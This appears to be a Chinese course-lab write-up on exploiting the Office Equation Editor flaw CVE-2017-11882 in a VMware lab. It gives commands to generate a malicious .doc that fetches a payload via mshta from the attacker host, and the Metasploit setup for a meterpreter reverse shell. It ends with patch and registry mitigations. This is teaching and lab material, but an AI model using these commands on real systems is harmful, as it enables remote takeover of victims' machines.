背景

工程实践题目:

渗透方向:实验班要求

1、利用已有的漏洞,搭建内网实验环境(WEB漏洞或系统漏洞以近两年内的CVE编号为准,每人一个,先报先得,具体由学习委员负责协调),利用工具进行内网渗透攻击。

2、要求必须用到端口转发方面的知识。

3、上交调试好的环境(VMware格式)、完整的渗透测试报告(包括环详细的境搭建文档、脚本分析文档、渗透攻击过程)、和教学实习报告。

漏洞影响版本

Office 365
Microsoft Office 2000
Microsoft Office 2003
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2
Microsoft Office 2013 Service Pack 1
Microsoft Office 2016

实验环境

攻击靶机:kali 2.0 IP:192.168.79.129 Metasploit
目标靶机:Windows7 IP: 192.168.79.128 Microsoft Office 2013

需要准备的文件

[CVE-2017-11882的POC](https://github.com/Ridter/CVE-2017-11882/)
[PS_shell.rb]
[Office 2013]

漏洞验证

使用POC文件执行以下命令生成测试doc文件:

python Command43b_CVE-2017-11882.py -c “cmd.exe /c calc.exe” -o test.doc

将生成的doc文件发送至目标主机直接打开,弹出计算器即漏洞验证成功,可进一步利用

漏洞利用

配合kali2.0 meterpreter 接收目标靶机反弹的shell

下载模块

下载PS_shell.rb,将该文件放在kali 的/usr/share/metasploit-framework/modules/exploits/windows/shells/目录下,输入msfconsole启动metasploit,然后执行reload_all重新加载一下所有模块。

使用模块

命令如下:

use exploit/windows/shells/PS_shellset payload windows/meterpreter/reverse_tcpset lhost 192.168.79.129set uripath abc

开启监听

命令:

exploit

反弹shell

使用POC生成新的测试doc文件,在目标靶机中打开生成的doc文件,目标靶机正常上线。

python Command109b_CVE-2017-11882.py -c “mshta http://192.168.79.129:8080/abc“ -o test2.doc

输入session可以查看到接收到的shell

选择sessions 1并获取目标靶机信息


漏洞修复

1、微软已经对此漏洞做出了修复。

(1)下载https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 更新补丁进行修补

(2)开启Windows Update功能,定期对系统进行自动更新

2、在注册表中禁用该漏洞模块:

按下Win+R组合键,打开cmd.exe

输入以下两条命令:

reg add “HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046} ” /v “Compatibility Flags” /t REG_DWORD /d 0x400reg add “HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046} ” /v “Compatibility Flags” /t REG_DWORD /d 0x400

相关链接:

http://zksmile.me/2017/11/28/CVE-2017-11882/

http://www.myh0st.cn/index.php/archives/329/


END

最新文章

  1. JS中的柯里化与反柯里化
  2. 在IIS EXPRESS下运行一个visual studio 项目,跳转到另一个项目的解决方案。
  3. 《奥威Power-BI案例应用:带着漫画看报告》腾讯课程开课啦
  4. Java就业指导
  5. SPFA+Dinic HDOJ 3416 Marriage Match IV
  6. sql 语句中使用条件判断case then else end
  7. Scrum 项目2.0
  8. 第十二章 管理类型(In .net4.5) 之 操作字符串
  9. SQL SERVER完整、差异和事务日志备份及还原(脚本和GUI实现) [原创]
  10. (3)VS2010+Opencv-2.4.8的配置攻略
  11. iOS - 应用程序国际化
  12. 之前采用的是Helper类的方法重构时改用了扩展方法
  13. HDU 5584 LCM Walk(数学题)
  14. C++ 句柄类
  15. Servlet和Filter生命周期
  16. 【NOIP2017 OFO】
  17. css 元素溢出
  18. opencv中的bitwise_not,bitwise_xor,bitwise_or,bitwise_and的使用方法与效果。
  19. 什么是Less、typescript与webpack?
  20. Oracle备份恢复之无备份情况下恢复undo表空间

热门文章

  1. <USACO06FEB>奶牛零食Treats for the Cowsの思路
  2. (一)mybatis简易搭建
  3. Selenium2自动化——初体验
  4. iOS多线程开发之GCD(中级篇)
  5. Cisco2960 交换机密码破解方法
  6. 机器CPU load过高问题排查
  7. 深度视觉盛宴——CVPR 2016
  8. PAT-进制转换-B1022 D进制的A+B (20分)
  9. 压力测试(七)-html可视化压测报告细讲
  10. kali linux下运行.sh文件权限不够解决办法